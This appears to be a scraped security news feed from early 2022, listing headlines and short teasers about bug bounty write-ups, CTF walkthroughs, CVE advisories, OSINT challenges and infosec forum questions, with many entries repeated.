    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Solidity Audit & Ethereum Smart Contract Analysis using Mythril - Blockchain Security #2
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Exposing the "InFraud Organization" - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Amazing! Feel like it's 2007 -- check out the slides here including the technical details here which I produced for https://whoisxmlapi.com here including the following Maltego technical details video demonstration video: Enjoy!
  • Open

    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
  • Open

    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
  • Open

    RCE in Samba(CVE-2021-44142)
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30158662 Points: 3 # Comments: 0  ( 1 min )
  • Open

    从 0 开始学 V8 漏洞利用之环境搭建(一)
    作者:Hcamael@知道创宇404实验室 最近因为某些原因开始学V8的漏洞利用,所以打算写一个系列的文章来记录一下我的学习过程。 概述 在开始研究V8之前肯定得有相应版本的环境,搭建v8环境的教程网上挺多的。在国内搭建环境,因为众所周知的原因,我们会遇到第一个瓶颈,网络瓶颈。不过也挺好解决的,把环境搭在vps上,网速是最快的。不过随后就会遇到第二个瓶颈,性能瓶颈,自用的vps一般性能都是1...
  • Open

    从 0 开始学 V8 漏洞利用之环境搭建(一)
    作者:Hcamael@知道创宇404实验室 最近因为某些原因开始学V8的漏洞利用,所以打算写一个系列的文章来记录一下我的学习过程。 概述 在开始研究V8之前肯定得有相应版本的环境,搭建v8环境的教程网上挺多的。在国内搭建环境,因为众所周知的原因,我们会遇到第一个瓶颈,网络瓶颈。不过也挺好解决的,把环境搭在vps上,网速是最快的。不过随后就会遇到第二个瓶颈,性能瓶颈,自用的vps一般性能都是1...
  • Open

    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    TheHuzz: Instruction Fuzzing of Processors Using Golden-Reference Models
    Article URL: https://arxiv.org/abs/2201.09941 Comments URL: https://news.ycombinator.com/item?id=30156948 Points: 1 # Comments: 0  ( 2 min )

  • Open

    Analyzing Malware with Hooks, Stomps and Return-addresses
    submitted by /u/jat0369 [link] [comments]
    Don't trust comments
    submitted by /u/crower [link] [comments]
    RCE and Auth Bypass in Aqua Illumination Hydra Series Aquarium Lights
    submitted by /u/laransec [link] [comments]
    Reverse Engineering 3201: Symbolic Analysis
    submitted by /u/OpenSecurityTraining [link] [comments]
    A story of leaking uninitialized memory from Fastly
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    TrendNET AC2600 RCE from the Internet
    submitted by /u/dinobyt3s [link] [comments]
  • Open

    Top Ways Websites get Hacked by Spammers
    There’s a lot that goes into a website environment in terms of functionality. Due to this, it’s only natural for one of the most commonly asked questions being how websites are usually hacked. In my previous post I talk about the Most Interesting Vulnerabilities of 2021, which should provide more insight into the more recent hacks seen, or caught beforehand. In this article we’ll be discussing the primary ways websites are infected, and how you can better prevent it from happening.  Continue reading Top Ways Websites get Hacked by Spammers at Sucuri Blog.
  • Open

    Lots of movies, TV shows, and top shelf porn
    192.64.86.228 submitted by /u/inoculatemedia [link] [comments]
    Movies, Documentaries, music, TV Series etc
    Quite a handful of TV Shows, Movies, Documentaries etc. Some content may be NSFW. ​ http://188.165.227.112/portail/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
  • Open

    Cyber Investigator OSINT CTF “Crime Scene Investigation” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT, forensics, and investigation challenges. Continue reading on Medium »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 02
    After having so much fun solving Hacktoria’s Geolocation — 01 challenge yesterday, I have decided today to go for the 2nd challenge. Here… Continue reading on Medium »  ( 5 min )
    Quiztime — Random OSINT Challenge 7
    On Jan 12, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and… Continue reading on Medium »  ( 1 min )
    What is OSINT?(Part 1): A practical introduction!
    This article was written in collaboration with the marvelous Aardwarewolf Continue reading on Medium »  ( 17 min )
    What is OSINT? (Part 1)
    A practical introduction Continue reading on Medium »  ( 16 min )
    Investigating Russian Number Plates
    Russian number plates come in a variety of shapes and sizes and can reveal interesting information regarding the owner of a target vehicle… Continue reading on Medium »  ( 3 min )
  • Open

    Multiple firewall layers - are they necessary?
    I was sitting around today pulling my hair out at the prospect of automating rulebases, objects, etc across the separate vendors we use for our edge and internal firewall. Then the question hit me - why do we even have an internal firewall? Our edge FW is a Palo capable of everything the internal FW does and then some. So why can't I simply take everything hanging off the internal FW, move it to the edge FW, and save some money while making my life much easier? The only things I can come up with that we lose are vendor diversity and physical separation. Am I crazy or missing something? If not - would I even gain anything out of VIRTUALLY splitting those firewalls via different vsys on the Palos (I imagine not)? Thanks! submitted by /u/difflx2112 [link] [comments]  ( 4 min )
    Modbus Traversal?
    My company has an air\gas utility monitor that's connected over cellular back to the utility provider for monitoring and reporting. Currently isolated from anything else. Our Facilities team want to put a modbus TCP device on it for our own internal monitoring and reporting. Anyone have experience with this sort of setup? If someone were to gain access to the utility monitor over cellular could they then utilize modbus to control and traverse our network through the modbus\TCP gateway? submitted by /u/ThePaulHarrell [link] [comments]  ( 2 min )
    Any special tips for a soon to be CISO?
    Hello, I'm about to become the CISO for a school I'm pretty confident on what I should do and what should be my first steps but I would like to know if any of you have any uncommon tips? Any good podcast/news source for example ? ​ Thanks ! submitted by /u/elminstor [link] [comments]  ( 4 min )
    Computer and phone security
    1) Thank you all for your suggestions on my former question. Id like to ask about some ways to secure an Android phone and a Windows computer. I am specifically looking for software and/or prefered settings to block intrusions from physical and wireless access in 2 scenarios 1) Someone gets the phone/computer physically and 2) Someone accesses it wirelessly. Id like to know what to do so the data are unreadable (Preferably encrypted) in scenario 1 while still keeping the phone/computer capable of basic functioning and so the phone/computer is harder to get into for attackers in (or before) scenario 2. Lets assume both devices are up-to-date with antivirus and firewall (When applicable). Id like to know the best method even if it means going around some hidden functions of the devices submitted by /u/O-0111 [link] [comments]  ( 1 min )
    Descriptive logic in Mobile Security
    Hi everyone! I'm a cybersecurity student and want to ask a slightly "stupid" question. In my program, there is a subject "Mobile security" where I was given the task to read a descriptive logic book of 500+ pages. So I wanted to ask, what does descriptive logic have to do with Mobile Security? Do you need to know and study this science to ensure the security of an application? submitted by /u/_hanabi_n [link] [comments]  ( 1 min )
    [MFA] Could a managed laptop count as a possession factor?
    Hi, I am supposed to secure a remote connection of company laptops with two factors. The devices are managed by Intune with conditional access. You need a company managed device to connect to the company network. Do you think that per definition the managed device with conditional access could count as a possession factor in a multi-factor authentication? Wikipedia says about the possession factor Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. One could argue that the device itself could count as a possession. It's not personalized but you still require one device out of a few hundred and one set of credentials to establish a connection. submitted by /u/Vertripper [link] [comments]  ( 4 min )
    Discovered IDOR vuln that reveal vaccination records
    Hello NetSec, Upon receiving my vaccination record, I discovered that I was able retrieve other vaccination records along with other patient data by simply incrementing url values. Worst part is that you can retrieve these records without being authenticated. The application initially authenticate patients to retrieve the records but, I found out you can reach the URL without being authenticated. Looking for suggestions to responsibly disclose this issue to the laboratory. I'm sure this is a violation of hipaa. submitted by /u/nocmd [link] [comments]  ( 2 min )
    Career advice request
    I’m currently a web application developer going on 10 years now. I also have 7 years in systems and network administration. I’ve always wanted to get into cybersecurity, but with so many roles out there, most asking for several years in security, I’m not sure what I’m actually qualified for. Over the years my networking knowledge and muscle memory have depleted, and perhaps feeling a bit imposter syndromey. The last server OS I supported was Windows Server 2003 so you could say I’m not up to speed on latest tech in the greater IT sphere. Also, I’m in my early 40s if that matters at all. Just looking for some general advice as to what, if anything, I should target my job search around. I’m definitely up to refresh/update my current skills with courses or whatever providing it makes sense to even pursue at this stage in my career. Thanks I’m advance. submitted by /u/zushazero [link] [comments]  ( 1 min )
  • Open

    How I approached Dependency Confusion!
    Hi People, In this blog, I will be sharing my approach for finding Dependency Confusion bugs. Continue reading on Medium »  ( 1 min )
    XSS Discovery and Exploitation With BurpSuite
    I’ve recently completed TryHackMe’s cross-site-scripting room and PortSwigger’s XSS labs and here’s what I’ve learned! This piece assumes… Continue reading on Medium »  ( 4 min )
    rDEX Bug Bounty
    Overview Continue reading on Medium »  ( 3 min )
    Vulnerability Capstone — Tryhackme
    Vulnerability Researching Continue reading on Medium »  ( 1 min )
    How I was able to buy a product for free — $$$
    Hi everyone, I hope you are good. It’s been a long time I haven’t write again. So in this article I will share about my finding.. Continue reading on Medium »  ( 1 min )
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »  ( 3 min )
  • Open

    SecWiki News 2022-01-31 Review
    SecWiki周刊(第413期) by ourren 配置错误注入测试中的挑战与机遇 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-31 Review
    SecWiki周刊(第413期) by ourren 配置错误注入测试中的挑战与机遇 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Vulnerability in PostBus public transport platform exposed customer data
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-postbus-public-transport-platform-exposed-customer-data Comments URL: https://news.ycombinator.com/item?id=30147933 Points: 1 # Comments: 0  ( 3 min )
    Inspector-gadget: exploit for a vulnerability in the Linux USB Gadget
    Article URL: https://github.com/szymonh/inspector-gadget Comments URL: https://news.ycombinator.com/item?id=30146403 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Puzzling RDP Cache - Putting the Pieces Together
    Good morning, It’s time for a new 13Cubed episode! Let's take a look at an easier way to reassemble RDP bitmap cache. And, if you're a little rusty on where to find the cache and how to export it, we'll cover that too! Episode: https://www.youtube.com/watch?v=9P845AMjJF0 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    Failed GNFA looking for tips and any advise for better learning in a better way
    Just failed my GNFA and i feel really bad; Anyone can help me out for any mental boost up by advising how i could be better in next go. submitted by /u/xray_icon [link] [comments]  ( 3 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    สาวแซ่บแบ่งรายได้จากคลิปเสียวใน OnlyFans ช่วยทหารผ่านศึก พร้อมเผยฝันอันยิ่งใหญ่
    เดลี่สตาร์ รายงานเรื่องราวของ คามี่ สเตรลล่า สาวแซ่บดาวเด่นบนแพลตฟอร์มสำหรับผู้ใหญ่อย่าง OnlyFans ที่เปิดเผยถึงความฝันในอนาคต… Continue reading on Medium »

  • Open

    Archive of software for the Tandy Radio Shack - TRS-80 Model III
    http://cpmarchives.classiccmp.org/trs80/Software/Model%20III/ circa 1979 submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    PDFs on Food science
    PDFs on Food safety, handling, manufacturing, storage, processing etc... ​ http://154.68.126.6/library/Food%20Science%20books/ submitted by /u/amritajaatak [link] [comments]
    Some Engineering Company website Back end
    Appears to be the back end FTP server of an engineering company website. no clue if its any useful or not. Maybe it is? ​ https://elsmar.com/pdf_files/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
    Some ODs doesn't show up in Reddit search but when trying to post, it says that it have been posted by someone?
    Lets take this NSFW OD for example: https://pmagazine.co/wp-content/uploads/ One result show up if I search for the domain. I decided to try to post it anyway since the URL he posted doesn't work anymore. When I tried to post there's a message about a duplicate post from a totally different user with the same URL. Why didn't that one show up when searching for "pmagazine"? There should be at least 2 results but only 1 is showing. submitted by /u/Boobalizer [link] [comments]  ( 1 min )
    Tranny hardcore videos (NSFW. Not my thing but who am I to judge)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    Building Custom Empire Modules
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    How do you get open-source releases of vulnerabilities and other cyber threat news?
    It seems like Twitter is the answer, but I'm curious if I'm missing some sort of centralized hub for this kind of information that is free of unimportant information. What do you personally use? submitted by /u/Hymnosi [link] [comments]  ( 1 min )
    Can you "DDOS" someone through their public IP without being connected to each other in any way?
    A friend came up to me and told me that someone was "DDOSing" him. He said he got his computer IP from a video game server and he "DDOsed" him. How could he tell? He said he noticed packet loss and he had a higher ping and it disconnected him from Discord or something, they were in a call the whole time when it happened. My friend changed his PC public IP with some Windows settings after that. Now my friend believes that this guy is some big brain hacker and I can't convince him he is not, I don't want him to believe that this guy is in control of his security. Would also love to know what exactly happened and what this script kiddie could've. submitted by /u/AnnoyingN-wah [link] [comments]  ( 2 min )
    Whats the best way to secure 1) An Android phone 2) A Windows PC and 3) Home and company network?
    Hello! Id like to know how to secure an Android phone (even if it means gaining root access) while keeping basic usability 2) How to secure a Windows computer against outside attacks (also while keeping basic functionality) 3) How to secure a home and company network against attacks and data leaks submitted by /u/O-0111 [link] [comments]  ( 2 min )
    [Serious] How Fast would Quantum Computers Crack Passwords/Tokens/Logins?
    From this video I watched from my Youtube feed, I'm aware of that quantum computers would be extremely fast in computing speed, but how fast would they be able to crack things that are say: Passwords 20, 50, 100 random-characters long with just ASCII input Passwords 20, 50, 100 random-characters long that utilize ASCII, Unicode, and non-standard characters The two same concepts above, but with random words like "water", "trampoline", etc. dropped randomly into the passphrases so it's just not jumbled, and requires a full dictionary of words to crack. Randomized session-login tokens, like used for Discord, Google, browser cookies in general. Weak, typical username + password combinations used for things like social media where both are shorter than 10 characters generally. Edit: T…  ( 5 min )
  • Open

    Intro to Embedded RE Part 3: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]  ( 1 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    submitted by /u/Most-Loss5834 [link] [comments]  ( 3 min )
  • Open

    How to find locations to check for Russian military build-up?
    Methods for Investigating where Russian troops accumulated along Ukraine border Continue reading on Medium »  ( 4 min )
    Walkthrough —Hacktoria: Geolocation 01
    I came across the Hacktoria website today whilst looking for OSINT information. If you navigate to “Practice” — “Geolocation” you’ll come… Continue reading on Medium »  ( 3 min )
    Why we must nurture positive ethics in “citizen-driven” OSINT
    As citizen-driven open source intelligence (OSINT) grows in popularity, so does the risk of techniques being used by bad actors. I outline… Continue reading on Medium »
  • Open

    Spare GCFA Practice
    Hey all Anyone here have a spare GCFA practice they could wing this way ? Despite multiple content run throughs and a comprehensive index, I flunked both my practice exams :S Second fail was surprising as I felt confident ! 2 weeks left now until the real thing so hoping some more turbo study and another practice may boost the confidence. Cheers ! submitted by /u/Gumps903 [link] [comments]  ( 1 min )
    Do the SANS Live Classes just reuse the slides from the book or do they have other slides to use during class time?
    Thanks! submitted by /u/curiousgal1996 [link] [comments]  ( 1 min )
    Recover Historical Firewall Logs
    Hi all, This relates to a computer running Windows 10 home. Several months ago a program made a request to make an outbound connection. This request was probably blocked by the default firewall. I would like to note any info about this request, particularly the date and time, but firewall logging was off. Is there somewhere else this would be stored? Thank you, and I'm sorry if this is the wrong forum for this. submitted by /u/KoosOomakey [link] [comments]  ( 1 min )
  • Open

    My Bug Bounty Adventure -2-
    Greetings everyone from the Promentorium bosporium. Continue reading on Medium »  ( 2 min )
    DARPA’s quest for the (almost) unhackable
    Welcome to Changelog by README! I’m your host, Blake Sobczak. Every Sunday, I’ll deliver cybersecurity news and analysis to your inbox… Continue reading on README_ »  ( 4 min )
    How I hacked my way to the top of DARPA’s hardware bug bounty
    Go inside one of the most technically challenging bug bounties ever with the researcher who subverted secure hardware designed by MIT and… Continue reading on README_ »  ( 9 min )
    How i exposed the teacher’s Aadhaar card,bank details in the college website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 1 min )
    All About CSRF Flaw
    Continue reading on InfoSec Write-ups »  ( 2 min )
    Docker: From a beginner's perspective
    Docker is actually a docker engine that is used to create containers. Containers can be considered as VMs, but these VMs don’t have any… Continue reading on Medium »  ( 6 min )
    Price Tampering | Buying T-Shirts at 2 INR
    Hello Weirdos!!! Today I am going to share a write-up on a weird price tampering vulnerability I found a few months ago(currently patched). Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - OS COMMAND INJECTION LAB ÇÖZÜMLERİ
    OS Command Injection, bir web uygulama sunucusunda, saldırganın rastgele işletim sistemi (OS) komutları çalıştırmasına ve uygulama… Continue reading on Medium »  ( 4 min )
    How to get started hacking django applications
    Django is a python based web framework. In this writeup, i will teach you how to analyze django based applications . For this writeup, i… Continue reading on Medium »  ( 4 min )
  • Open

    Critical full compromise of jarvis-new.urbanclap.com via weak session signing
    Urban Company disclosed a bug submitted by ian: https://hackerone.com/reports/1380121 - Bounty: $1500
    No character limit in password field
    UPchieve disclosed a bug submitted by tomyway: https://hackerone.com/reports/1462175
  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
  • Open

    SecWiki News 2022-01-30 Review
    威胁想定分析框架 by ourren wJa (D&S&I)AST 工具 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-30 Review
    威胁想定分析框架 by ourren wJa (D&S&I)AST 工具 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    EISS-2021:从大型互联网企业零信任实践之路谈如何构建立体化的防御体系
    注:本议题公开发布于EISS-2021。
    INSEC-2020:大型企业基础架构安全
    注:本议题公开发布于INSEC-2020。
    CTIC-2020:云上攻防的实践与思考
    注:本议题公开发布于CTIC-2020。
    BCS-2020:以攻促防之攻击者视角下的防御建设
    注:本议题公开发布于BCS-2020。
  • Open

    网信办公布网络关键设备和网络安全专用产品安全认证和检测结果
    1月29日,中央网信办官网发布了2022年1号公告《关于统一发布网络关键设备和网络安全专用产品安全认证和安全检测结果的公告》。

  • Open

    JAVA ON EARTH [KNIGHT-CTF]
    Given Data: Continue reading on Medium »  ( 2 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    xeuldoc: Fetch information about any public Google document
    Introduction Continue reading on Medium »  ( 1 min )
    קורס אוסינט בסיסי
    קורס OSINT בסיסי — חיפושים ברשת למתחילים — סילבוס Continue reading on Medium »  ( 1 min )
    Finding the author of an illustration
    A while ago I spotted an image on reddit that really struck with me. I immediately knew I wanted to use it as my profile picture… Continue reading on Medium »  ( 2 min )
    In the beginning there was a tweet
    For the past year and a half I have been very interested in a career change into the cyber security and ethical hacking industry. I have… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 6
    On Jan 13, 2022, Quiztime (contributor @N_Waters89) shared a new OSINT quiz with us. The objective simple. We had to figure out where and w Continue reading on Medium »  ( 2 min )
  • Open

    Windows vulnerability with new public exploits lets you become admin
    Article URL: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/ Comments URL: https://news.ycombinator.com/item?id=30130902 Points: 7 # Comments: 0  ( 4 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
    NMAP Vulnerability Scanning Scripts
    Article URL: https://github.com/nccgroup/nmap-nse-vulnerability-scripts Comments URL: https://news.ycombinator.com/item?id=30122224 Points: 2 # Comments: 0  ( 1 min )
  • Open

    GitHub: The Red-Teamer’s Cheat-Sheet
    It’s no secret that GitHub has become one of the main information resources for red-team reconnaissance. I mean, why bother with complex… Continue reading on Medium »  ( 3 min )
    How To Handle Security Due Diligence During The M&A Process
    More often than not, we see our clients show interest in other companies. This pull can come in many different forms, but it’s usually… Continue reading on Medium »  ( 2 min )
  • Open

    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made $15,000+ By Hacking Caching Servers — Part 1
    @bxmbn Continue reading on Medium »  ( 1 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    A Summary of OAuth 2.0 Attack Methods
    The attacker grabs the authentication request to construct a malicious URL and deceives the logged-in user of the server to click it. Continue reading on Medium »  ( 2 min )
    TrustRecruit — BUG BOUNTY
    TrustRecruit will be allocating 750,000 TRT of the total supply of $TRT tokens to successful bounty hunters. Continue reading on Medium »  ( 2 min )
    2fa Bypass by changing Request method to DELETE
    Hello Everyone My name is Arth Bajpai, I’m from Lucknow, India, and I’m back with my third write-up about a 2fa Bypass which I Found a… Continue reading on Medium »  ( 3 min )
    My First Bug is P1 in Just 3 Minute
    Hello Hacker’s and Security Guys that is My first article on how to find a P1 bug Continue reading on Medium »  ( 1 min )
  • Open

    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
  • Open

    Some lingerie photos NSFW (among other more boring stuff)
    submitted by /u/Boobalizer [link] [comments]
    PS3 sound files from games - Nicely sorted (Good speed. ~11 MB/s.)
    submitted by /u/Boobalizer [link] [comments]  ( 1 min )
  • Open

    Misconfiguration in build environment allows DLL preloading attack
    Monero disclosed a bug submitted by nim4: https://hackerone.com/reports/896338
    XSS via X-Forwarded-Host header
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1392935 - Bounty: $200
  • Open

    how did my Hosting service changed my interface config?
    Hello AskNetsec, I got a VPS on a hosting service with ubuntu on it and I closed all the ports changed the default ssh port and changed the root and default user passwords, then I asked my hosting service o change my public IP address, After that I saw my /etc/network/interfaces config changed...how did they do that? even there is nothing in the history :\ any info on how they did it is apricated. ​ thanks! submitted by /u/g0g0gaga [link] [comments]  ( 1 min )
    How are you guys using IOCs in your SIEM environment?
    Hey everyone! I was curious how everyone is using IOCs in their SIEM environments. We are currently focusing on TTP’s but would love to have the ability to compare our logs against known positive IOCs. We are currently only using them in our EDR solution but not our SIEM. How are you guys using them in the SIEM platform? submitted by /u/RedNeckHutch [link] [comments]  ( 2 min )
    Just finished my first week of training in SOC. Anyone here familiar with MAStermind? Looking for resources to study over the weekend.
    SOC training has been so cool. The access I have is nuts. submitted by /u/ShittyF00dPorn [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Five Hacking Tips - Pkexec Linux Priv. Escalation
    submitted by /u/sysrisk [link] [comments]
  • Open

    FreeBuf早报 | 芬兰外交官设备感染飞马间谍软件;美国以国安为由吊销中国通讯公司牌照
    据外媒报道,美国联邦通信委员会(FCC)以“严重的国家安全担忧”为由,吊销了中国联通美洲公司的牌照。  ( 1 min )
    Packer ?对抗 ?“透明部落”正在寻求CrimsonRAT的新出路
    Transparent Tribe组织的主要目标是针对印度政府、军队或相关组织,以及巴基斯坦的激进分子和民间社会。  ( 1 min )
    社会责任 | 斗象科技2021年的“FUN心”之道
    使命担当,践行责任
    编写基于RestTemplate的—在线武器库
    通过Springboot RestTemplate玩转自动化工具开发,达到团队协作的真正功能。  ( 2 min )
    工业网络靶场漫谈(八)|国外工业网络靶场概况
    本文将将把视角移向国外,简要梳理介绍国外工业网络靶场的发展状况。  ( 1 min )

  • Open

    North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Detecting and mitigating CVE-2021-4034: “Pwnkit” local privilege escalation
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    How to Analyze RTF Template Injection Attacks
    submitted by /u/ogunal00 [link] [comments]
    Pivoting with SSH Tunnels and Plink
    submitted by /u/m_edmondson [link] [comments]
    Rip Raw - A tool to analyse the memory of compromised Linux systems.
    submitted by /u/0x636f6f6c [link] [comments]
    Stop Storing Secrets In Environment Variables!
    submitted by /u/alxjsn [link] [comments]  ( 3 min )
    ROP Chaining: Return Oriented Programming (study notes, tutorial)
    submitted by /u/Kondencuotaspienas [link] [comments]
    "Stratus Red Team": open-source adversary emulation for AWS
    submitted by /u/thorn42 [link] [comments]
    The Cookies Parasite - Bypassing MFA with cookie theft
    submitted by /u/amirshk [link] [comments]
  • Open

    CTF Walkthrough | TryHackMe | Freshly
    Can you root this Wordpress style, SQL injection vulnerable machine? This CTF is about SQL Injection and Wordpress hacking. Developers… Continue reading on Medium »  ( 4 min )
  • Open

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
    RHSB-2022-001 Polkit Privilege Escalation – (CVE-2021-4034)
